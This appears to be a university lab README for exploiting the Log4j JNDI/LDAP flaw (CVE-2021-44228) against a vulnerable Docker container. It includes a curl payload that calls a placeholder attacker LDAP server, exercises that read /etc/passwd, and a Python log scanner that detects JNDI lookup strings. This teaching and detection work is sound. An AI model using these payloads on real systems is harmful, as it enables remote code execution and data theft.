Warning: This repository is only for educational purposes.

## Index

- Introduction
- Prerequisites
- Setup the environment
- Lab Instructions
  - Setting up the victim's and attacker's environments
- Lab Questions
- References
## Introduction

Welcome to the Log4j lab for PRA9201.

In this lab we will explore the exploitation of Log4j through JNDI and LDAP lookups (CVE-2021-44228).

This lab works on Windows, macOS (Intel and M1) and Linux.
## Prerequisites

- Docker (https://docs.docker.com/install/) or Docker Desktop (https://www.docker.com/products/docker-desktop/)
- Java (https://www.oracle.com/technetwork/java/javase/downloads/index.html)
- Maven (https://maven.apache.org/download.cgi)
- See the "Setup the environment" section below for installation steps on Debian-based systems.
## Setup the environment

Note: the following instructions are for Debian-based systems only.

```bash
# Set up the Docker apt repository
sudo apt update
sudo apt install ca-certificates curl gnupg lsb-release
# Add Docker's official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
# Set the Docker channel to stable
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
# Install the Docker engine
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io
# Verify Docker is working
sudo docker run hello-world
# Install Java
sudo apt update
sudo apt install default-jre
# Install Maven
sudo apt update
sudo apt install maven
```
## Lab Instructions

### Setting up the victim's and attacker's environments

Victim side:

```bash
# Go into the victim/ folder
cd victim
# Build and run the vulnerable victim server
docker build . -t victim-vulnerable-app
docker run --name victim -p 8080:8080 victim-vulnerable-app
# To verify the container is working, open http://ip_addr:8080 in your browser.
# You should see a page, though it will show an error.
```

Attacker side:

```bash
# Go into the attacker/ folder
cd attacker
# Package the Java program
mvn package
# Run the attacker's malicious LDAP server
# TODO: Figure out how to run the LDAP server
# (Lab Q5.)
# HINT: Run java -jar target/RogueJndi-1.1.jar -h
# HINT 2: What is the attacker's IP?
# Send the attack payload to the victim's server
# HINT: What is the victim's IP?
# NOTE: Make sure you replace victim_ip and attacker_ip
curl victim_ip:8080 -H 'X-Api-Version: ${jndi:ldap://attacker_ip:1389/attack}'
# Check inside the victim container to see whether the file has been created or modified
```
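As an added defensive counterpart to the steps above (example code written for this page, not part of the lab's victim or attacker code), the following Python script scans constructed access-log lines for the JNDI lookup string that the curl command sends in the X-Api-Version header. The log format and the 203.0.113.9 address are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The last two carry
# the lookup string this lab sends in the X-Api-Version header, the final one
# percent-encoded as a proxy or client might emit it. 203.0.113.9 is a
# placeholder attacker address.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: 1.0"
10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET /health HTTP/1.1" 200 "X-Api-Version: 2.3"
10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 500 "X-Api-Version: ${jndi:ldap://203.0.113.9:1389/attack}"
10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 500 "X-Api-Version: %24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fattack%7D"
"""

# "${jndi:<scheme>:<rest>}". Case-insensitive so a differently cased prefix is
# not missed; the capture groups give the scheme and target for the alert.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*([^}]*)\}", re.IGNORECASE)


def normalise(line: str) -> str:
    """Percent-decode up to twice (double encoding is common in proxied
    traffic) so an encoded lookup string is seen in the form Log4j would
    eventually see it."""
    decoded = line
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def find_jndi_lookups(log_text: str) -> list:
    """Return one finding per log line containing a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = JNDI_RE.search(normalise(line))
        if m:
            findings.append({
                "line": lineno,
                "src_ip": line.split(" ", 1)[0],   # first field of the log line
                "scheme": m.group(1).lower(),
                "target": m.group(2),
            })
    return findings

if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src_ip']} sent a jndi:{f['scheme']} lookup to {f['target']}")
```

Run it directly to print the two findings; in a real deployment it would be fed the application's request logs and any match would raise an alert naming the source IP and the contacted host.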
## Lab Questions

Here is the Google Drive link for you to clone and write your answers in: link.

1. How does the vulnerability in Log4j work in terms of JNDI?
2. What did people do when they discovered the vulnerability?
3. What steps did they take to prevent any further exploitation?
4. Why do you need a dedicated malicious LDAP server, instead of using any of the existing ones on the internet?
5. Why do you need to execute the `java` command to spin up a server before you execute `curl`?
6. Execute the LDAP server command to touch a file at `/tmp/ha-pwned` and provide a screenshot of `ls -la /tmp/` as well as the command executed.
7. Modify the previous command, but now copy `/etc/passwd` into `/tmp/ha-pwned` and provide a screenshot of `cat /tmp/ha-pwned` as well as the command executed.